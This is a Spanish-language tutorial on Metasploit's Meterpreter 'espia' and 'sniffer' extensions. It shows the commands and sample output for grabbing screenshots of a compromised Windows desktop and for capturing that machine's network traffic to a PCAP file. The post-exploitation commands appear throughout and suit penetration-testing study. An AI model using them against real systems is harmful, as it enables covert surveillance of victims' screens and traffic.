METERPRETER, USANDO LAS EXTENSIONES ESPIA Y SNIFFER

Espia

Con la extensión Espia, es posible intentar obtener imágenes de la pantalla del usuario en un momento determinado (screenshots) por medio de meterpreter, se trata de una extensión que utiliza algunas funcionalidades incluidas en stdapi en especial aquellas relacionadas con la escritura/lectura de bytes en la maquina comprometida.

Para usar correctamente esta extensión es necesario obtener en primer lugar el desktop asociado al Window Station 0 (WinSta0) es posible averiguar la estación en la que se ejecuta un objetivo determinado por medio del comando getdesktop tal como se ha indicado en entradas anteriores:

meterpreter > getdesktop

Session 0\WinSta0\Default

Una vez hecho esto, podemos cargar la extensión (si esta no se encuentra cargada):

meterpreter > use espia

Loading extension espia…success.

meterpreter > screengrab

Screenshot saved to: /opt/metasploit3/msf3/lANGfATD.jpeg

Con el comando screengrab, se ha creado una imagen del estado actual del desktop, enseñando programas abiertos y demás elementos que se encontrarán activos visualmente.

Sniffer

Por otro lado se encuentra la extensión sniffer que nos permite monitorizar y/o auditar la actividad de los paquetes entrantes y salientes de una maquina remota comprometida.

Al igual que con la extensión espiá, es necesario cargar esta extensión para poder hacer uso de ella:

meterpreter > use sniffer

Loading extension sniffer…success.

Los comandos disponibles de la extension sniffer son:

Sniffer Commands

================

Command Description

——- ———–

sniffer_dump Retrieve captured packet data to PCAP file

sniffer_interfaces Enumerate all sniffable network interfaces

sniffer_start Start packet capture on a specific interface

sniffer_stats View statistics of an active capture

sniffer_stop Stop packet capture on a specific interface

Para familiarizarse con estos comandos se debe comenzar por conocer su uso

sniffer_interfaces:
Retorna las interfaces disponibles en la maquina remota junto con información relacionada con sus dispositivos.

meterpreter > sniffer_interfaces

1 – ‘National Semiconductor DP83815-Based PCI Fast Ethernet Adapter’ ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

sniffer_start:

Inicia el monitoreo activo sobre una Interface de red especificada, (esta Interface de red se indica por medio del identificador de la misma, que puede ser obtenido con el comando sniffer_interfaces)

meterpreter > sniffer_start 1

[*] Capture started on interface 1 (50000 packet buffer)

sniffer_stats:

Con este comando podemos ver cuantos paquetes han sido capturados por la extensión sniffer, como en el caso de sniffer_start es necesario indicar el identificador del dispositivo.

meterpreter > sniffer_stats 1

[*] Capture statistics for interface 1

bytes: 738

packets: 14

sniffer_dump:

Permite volcar los paquetes capturados en un fichero pcap, donde posteriormente es posible visualizarlo con una herramienta como wireshark y realizar el análisis correspondiente a la información obtenida, para su uso es necesario especificar el identificador de la interface y el nombre del fichero donde se almacenará la información capturada.

meterpreter > sniffer_dump 1 target.pcap

[*] Flushing packet capture buffer for interface 1…

[*] Flushed 74 packets (10523 bytes)

[*] Downloaded 100% (10523/10523)…

[*] Download completed, converting to PCAP…

[*] PCAP file written to target.pcap

sniffer_stop:

Finalmente cuando hemos terminado de obtener paquetes o deseamos parar el monitoreo por alguna razón podemos usar este comando para hacerlo

meterpreter > sniffer_stop 1

[*] Capture stopped on interface 1

Aunque resulta muy útil, tiene algunas limitaciones, como por ejemplo el uso de filtros, ya que es una característica inexistente en esta extensión, por esta razón no podemos capturar solamente determinados paquetes que deseemos, sino que los obtenemos todos, lo que dificultará el proceso de análisis de paquetes capturados, en embargo, es posible utilizar el fichero PCAP y cargarlo a una herramienta como WireShark que permite una serie de filtros muy interesantes sobre los paquetes capturados, por lo tanto se aconseja su uso.